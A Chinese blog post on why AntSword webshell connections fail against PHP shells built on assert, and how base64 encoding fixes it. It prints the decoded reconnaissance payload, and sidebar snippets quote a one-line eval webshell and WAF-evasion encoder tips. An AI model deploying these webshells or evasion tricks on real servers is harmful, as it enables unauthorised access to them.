蚁剑连接两个形式--免杀

于 2024-03-13 22:01:25 发布
阅读量752 收藏 3
点赞数 6
分类专栏: 网络安全 文章标签: java 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68976043/article/details/136692705
版权
文章讨论了在PHP中,assert函数的限制导致其无法执行多行代码,而eval则没有此问题。通过base64编码绕过assert的限制,解决了蚁剑shell中遇到的编码问题。
摘要由CSDN通过智能技术生成

base64: 

 

default: 

 

这里简单来说就是eval函数中参数是字符,如:eval('echo 1;');assert函数中参数为表达式 (或者为函数),如:assert(phpinfo())  

我们将默认编码解码看看

@ini_set("display_errors", "0");
@set_time_limit(0);

function asenc($out) {
    return $out;
};

function asoutput() {
    $output = ob_get_contents();
    ob_end_clean();
    echo "97a7a";
    echo @asenc($output);
    echo "777a7fdcd7c";
}
ob_start();
try {
    $D = dirname($_SERVER["SCRIPT_FILENAME"]);
    if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
    $R = "{$D}	";
    if (substr($D, 0, 1) != "/") {
        foreach(range("C", "Z") as $L) if (is_dir("{$L}:")) $R. = "{$L}:";
    } else {
        $R. = "/";
    }
    $R. = "	";
    $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
    $s = ($u) ? $u["name"] : @get_current_user();
    $R. = php_uname();
    $R. = "	{$s}";
    echo $R;;
} catch (Exception $e) {
    echo "ERROR://".$e - > getMessage();
};
asoutput();
die();

大致的意思会输出一些内容 随机字符串+环境变量+随机字符串,如果用eval代替assert是完全没问题的,我查了下资料,assert是不能执行多个语句的,eval可以,所以这里使用assert会有返回为空的问题。

这个问题可以使用base64编码的问题解决,编码后的数据包,可以看到ant这个参数传入的是一句话,因此就可以通过assert执行成功。

这里就是蚁剑使用assert的shell的一个坑,如果使用assert不要使用默认编码。

凌晨五点的星
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
webshell动态加密连接分析与实践
悦分享
08-05 2338
antSword的自定义编码器,打开的系统设置就可以看到编码管理选项,这里选择新增一个编码器。点击新增编码器,命名之后点击编辑,可以通过代码和注释看出编码器的作用,这些代码主要就是javascript node.js基础语法。然后我们修改一下代码,随机字符串+传输数据base64 这样的结果是干扰一些waf进行模糊解码,这样是不可能被直接解密。/*** php::base64编码器*//** @param {String} pwd 连接密码。...
一句话木马免杀
最新发布
liushaojiax的博客
01-09 465
链接:https://pan.baidu.com/s/1t3DVuSHitZ7gPcywXnXwVA?upload是php写的需要搭建php环境推荐phpstudy。可以看到已经拦截到上传的图片,现在可以更改文件后缀;可以看到已经上传成功了然后右键获取到图片地址。由于有上传限制我们将写的木马文件改为png。注意:由于电脑有安全管家,这样写是不行的。5、bp拦截文件,打开谷歌代理和bp拦截。2、安装谷歌代理,Burp、;1、搭建靶场upload。6、使用获取靶机。双击就可以获取到靶机。
【webshell工具——安装使用教程
SUSUYUA的博客
02-06 1万+
本篇内容主要为webshell工具的安装以及使用,本人也通过查询较多的文章,进行了总结,由于是第一次接触,有些地方可能存在问题,欢迎评论区留言。
中国安装使用教程
热门推荐
天天学安全专属博客
03-29 1万+
中国安装教程,中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。如上主要包括的下载,连接一句话木马,更改木马连接参数,绕过WAF。
m0_64338211的博客
01-16 1265
1.编写一句话木马,并命名为post.php 2.利用""连接靶机上的post.php (1)打开中国 (2)在“中国"主界面空白处单击鼠标右键,在弹出的菜单中选择"添加数据" 添加一条Webshell管理项 3、利用“中国"对靶机进行虚拟终端及文件操作 (1)虚拟终端操作 打开虚拟终端界面后,可以像操作本地机器一样,对靶机执行一些操作系统命令 (2)文件操作、数据操作 ...
连接一句话木马
m0_64417923的博客
05-18 8272
一,在服务器上安装phpstudy 二,安装成功后启动apache 三,打开网站,看看是否成功 四,在攻击端安装菜刀 安装好后尝试用浏览器进入服务器搭建的网站(必须先设置好桥接) 输入服务器ip即可 cmd输入:ipconfig 正常情况下需要通过网站的漏洞,将一句话木马上传到网站上, 五,将一句话木马复制到网站 不过这次只是测试学习如何使用一句话木马的,所以直接将一句话木马复制到网站中: 创建一个文本,写入 <?php eval($_REQUEST[123..
群算法-最优路径软件包下载(二维).zip
01-06
6. **DijkstraPlan.m**:与上面的DijstraPlan.m重复,可能是命名错误或者有两个不同的版本。 7. **lines.txt**:此文件可能包含了二维空间中的线路信息,例如各个节点之间的连通关系,或者是每条边的权重。 8. **...
java源码包---java 源码 大量 实例
04-18
两个例子,无状态SessionBean可会话Bean必须实现SessionBean,获取系统属性,初始化JNDI,取得Home对象的引用,创建EJB对象,计算利息等;在有状态SessionBean中,用累加器,以对话状态存储起来,创建EJB对象,并将...
群算法最短路径matlab程序_群算法_最短路径_最短路径matlab_
10-02
1. **定义问题**:首先,我们需要将实际问题转化为图论中的形式,即构建一个有向图,其中节点表示路径上的位置,边表示连接这些位置的路径,权重则表示路径的代价(如距离、时间等)。 2. **初始化**:设定群的...
成百上千个Java 源码DEMO 4(1-4是独立压缩包)
03-29
Java EJB中有、无状态SessionBean的两个例子 两个例子,无状态SessionBean可会话Bean必须实现SessionBean,获取系统属性,初始化JNDI,取得Home对象的引用,创建EJB对象,计算利息等;在有状态SessionBean中,用...
成百上千个Java 源码DEMO 3(1-4是独立压缩包)
03-29
Java EJB中有、无状态SessionBean的两个例子 两个例子,无状态SessionBean可会话Bean必须实现SessionBean,获取系统属性,初始化JNDI,取得Home对象的引用,创建EJB对象,计算利息等;在有状态SessionBean中,用...
攻防兼备:中国使用指南及特征流量
qq_61553520的博客
04-12 3942
中国是菜刀的升级版本,线现下主流的Webshell连接工具之一,有着较广泛的使用,本篇文章会教给大家的使用方法以及不同加密方式的流量特征,兼顾攻防两端。
assert利用登录
ikta的博客
07-29 2732
在本地站点下创建test.php页面,编写一句话木马,用火狐浏览器的HackBar来执行第一步第二步第三步输出结果这就是通过post提交值传进来后打印出来假如我们提交的是这个结果再次提交,输入2=phpinfo();显示页面这就是通过火狐演示一句话木马上线方式接下来聊一聊。...............
一句话木马构造与连接
qq_52395989的博客
08-16 2051
1.上传文件含一句话木马的shell.php,复制图片链接http://2095b394-7d95-4957-bd2e-1d3e5fe29b34.node4.buuoj.cn:81/upload/shell.php。2.准备一张图片和muma.php放在同一个文件夹中,cmd进入该文件夹。1.创建一个txt文档,把上述命令写入,保存为muma.php。2.打开——>添加数据。3.最后点击添加就完成了。
的基本使用
yuqnqi的博客
05-08 1405
我的是 “D:\LeStoreDownload\phpStudyjiayou\phpstudy_pro\WWW\site”进入webshell.top的根目录,新建.txt文档,将后缀名改为.php并写入一句话木马。开启浏览器访问木马,我的页面是出现警告信息,不是报错,因为我设置的是显示警告信息。接下打开webshell.top的根目录,测试连接成功后 点击左上角的 “添加”响应码为200,说明脚本正常运行。接下来使用连接webshell。这里正常会返回403,不要慌。打开,单击右键, 添加数据。
WebSell管理工具--中国安装教程以及初始化
Aluxian_的博客
07-16 2156
WebSell管理工具--中国安装教程以及初始化。
软件的配置与应用
weixin_45711977的博客
10-27 7447
中国
【网络安全】AntSword()入门+实战
等风来
04-27 3477
(AntSword)是一款开源的跨平台WebShell管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。中国的特点主要有如下几点:1.支持多平台。包括macOS、Linux 32位、Linux 64位、Linux armv7l、Linux arm64、Windows 32位、Windows 64位。2.完善的文档。中国文档地址。3.多项功能。文件管理功能、虚拟终端功能、数据库管理功能。4.内置代理功能。
如何在页面上使两个el-descriptions连接起来
06-10
要在页面上使两个 `<el-descriptions>` 连接起来,可以设置它们的 `border` 属性为 `false`,然后在第一个 `<el-descriptions>` 的最后一个 `<el-descriptions-item>` 元素上添加 `class`属性,比如 `connect-line`,然后在 CSS 中添加以下样式: ``` .el-descriptions.connect-line .el-descriptions__item:last-child { border-bottom: none; } .el-descriptions.connect-line .el-descriptions__item:last-child .el-descriptions__content { padding-bottom: 0; } .el-descriptions.connect-line .el-descriptions__item:last-child .el-descriptions__content::before { content: ""; position: absolute; left: 50%; bottom: -10px; width: 1px; height: 10px; background-color: #ebeef5; transform: translateX(-50%); } ``` 这样就可以在第一个 `<el-descriptions>` 的最后一个 `<el-descriptions-item>` 元素和第二个 `<el-descriptions>` 的第一个 `<el-descriptions-item>` 元素之间添加一条连接线了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值